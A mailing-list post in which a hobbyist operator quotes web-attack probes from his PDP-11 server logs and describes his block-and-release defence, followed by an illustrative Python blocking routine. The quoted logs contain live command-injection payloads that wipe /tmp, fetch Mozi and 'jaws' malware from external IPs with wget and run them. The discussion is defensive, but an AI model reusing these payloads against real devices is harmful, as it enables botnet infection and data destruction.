[Info-vax] Anti-virus ?

Johnny Billquist bqt at softjar.se
Mon Aug 14 19:04:53 EDT 2023


On 2023-08-14 16:11, plugh wrote:
> On Monday, August 14, 2023 at 4:12:37 AM UTC-7, Johnny Billquist wrote:
>> Examples:
>>
>> . GET /wp-login.php
>>
>> (seems to be just lots of these probing if wordpress is running on the
>> host, so lots of variations on this one...)
>>
>>
>> . GET
>> /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
>>
>> (I think we can safely assume that 60.189.27.88 isn't an official site
>> of netgear configurations...)
>>
>>
>> . GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws
>>
>> (Do people really set up their web servers to have shell as a CGI???)
>>
>>
>> Those are just a few examples from just a couple of hours of logs on my
>> RSX machine...
>>
>> Johnny
> 
> How is RSX configured to respond to these requests? It's impressive how many of these requests can be stuffed into the pipeline from one IP.

Most of that stuff simply generates 404, since there is no such URI that 
is valid in my system. (Why would I even set it up to accept something 
to /wp-login.php? I don't even have PHP under RSX...)

> I'm particularly impressed by attacks from soi-disant whitehats.
> 
> It was one of my first tests of generative AI: Translate the phrase “va fa culo” from Italian to at 10 different languages including Klingon, Esperanto, English. Include at least one rte language
> 
> As part of a "get off my servers" message to one of them. It's a nice form of extortion.

:-)

> It doesn't seem much use to have these sorts of logs with an active response component. Certainly writing emails is fun, but it can accomplish only so much. Most of the WordPress stuff has to be blocked by packet filtering after so many of these attempts from the same address. Some of these clowns have to invest serious money to get blocks of IP addresses from which to launch these attacks. Yes, WordPress certainly has a big target on its back: "Interesting birthmark you got there, Hal"
> I mean how many "get wplogin" requests do you allow before blocking that address? If the RSX system is just a honeypot, never mind.

It's not a honeypot. My RSX systems are doing legit stuff.
I log every request over http, just as I log all sessions talking to 
SMTP, FTP, and other bits. That system serves on average about 0.5G of 
useful data per day. Which is not bad for a PDP-11 system... (A lot of 
it is web crawlers, though, like Google.)

I don't in general filter anything. I see this as the most excellent 
testing setup to figure and fix any problems I can spot. The more abuse, 
the better the system becomes. It's now at a point where I can't really 
remember when I last had some serious problem.

However, yes, there is a "defence" mechanism. If the system detects a 
lot of "bad" traffic from an address, it will eventually get blocked, 
and the block will only drop once there is no traffic from that address 
for a certain amount of time. And of course, if they start abusing 
again, they will get blocked again.

   Johnny
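As an added illustration of the block-and-release mechanism described in the message above (example code written for this page, not the RSX system's own implementation): a per-address counter that blocks an address after a burst of error-producing requests and lifts the block once that address has been silent for a while, re-blocking it if the abuse resumes. The thresholds, the log format and the 192.0.2.x addresses are assumed or constructed for the demonstration.

```python
from collections import defaultdict, deque
BAD_THRESHOLD = 5      # assumed: bad requests within WINDOW seconds before an address is blocked
WINDOW = 60.0          # assumed: seconds over which bad requests are counted
IDLE_RELEASE = 300.0   # assumed: seconds with no traffic before a block is lifted
class AbuseBlocker:
    def __init__(self):
        self.bad = defaultdict(deque)  # ip -> timestamps of recent bad requests
        self.blocked = {}              # ip -> time of last traffic seen while blocked

    def observe(self, ts, ip, status):
        """Record one request; return True if it should be dropped."""
        if ip in self.blocked:
            self.blocked[ip] = ts      # traffic from a blocked address keeps the block alive
            return True
        if status >= 400:              # "bad" here means the request produced an error
            q = self.bad[ip]
            q.append(ts)
            while q and ts - q[0] > WINDOW:
                q.popleft()            # forget bad requests that fell out of the window
            if len(q) >= BAD_THRESHOLD:
                self.blocked[ip] = ts
                q.clear()
                return True
        return False

    def expire(self, now):
        """Lift blocks on addresses silent for at least IDLE_RELEASE seconds."""
        for ip in [ip for ip, t in self.blocked.items() if now - t >= IDLE_RELEASE]:
            del self.blocked[ip]

# Constructed log ("epoch source_ip method path status"); 192.0.2.x are placeholder addresses.
SAMPLE_LOG = """\
1000 192.0.2.10 GET /wp-login.php 404
1001 192.0.2.10 GET /wp-login.php 404
1002 192.0.2.10 GET /setup.cgi 404
1003 192.0.2.10 GET /shell 404
1004 192.0.2.10 GET /wp-login.php 404
1005 192.0.2.10 GET / 200
1006 192.0.2.20 GET /index.html 200
1400 192.0.2.10 GET /wp-login.php 404
"""
def replay(log):
    """Feed log lines through the blocker; return (blocker, dropped requests)."""
    blocker, dropped = AbuseBlocker(), []
    for line in log.splitlines():
        ts, ip, _method, path, status = line.split()
        ts = float(ts)
        blocker.expire(ts)                       # time advances with the log
        if blocker.observe(ts, ip, int(status)):
            dropped.append((ts, ip, path))
    return blocker, dropped
```

Replaying SAMPLE_LOG drops the fifth probe and the request right after it, then the 1400 request is admitted again because the block has lapsed, but it starts a fresh count toward the next block.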